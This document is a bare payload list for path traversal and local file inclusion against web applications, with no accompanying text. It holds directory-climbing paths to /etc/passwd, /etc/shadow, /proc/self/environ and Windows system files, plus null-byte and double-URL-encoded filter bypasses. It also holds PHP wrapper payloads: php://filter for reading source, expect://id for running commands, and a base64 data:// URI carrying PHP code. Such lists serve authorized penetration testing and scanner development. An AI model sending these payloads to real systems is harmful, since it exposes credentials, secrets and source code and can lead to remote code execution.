../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/motd
/etc/issue
/proc/self/environ
/proc/version
/proc/cmdline
../../../windows/win.ini
../../../../windows/win.ini
../../../../../windows/win.ini
../../../../../../windows/win.ini
../../../../../../../windows/win.ini
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
C:\windows\system.ini
../../../etc/passwd%00
../../../../etc/passwd%00.jpg
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
expect://id
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+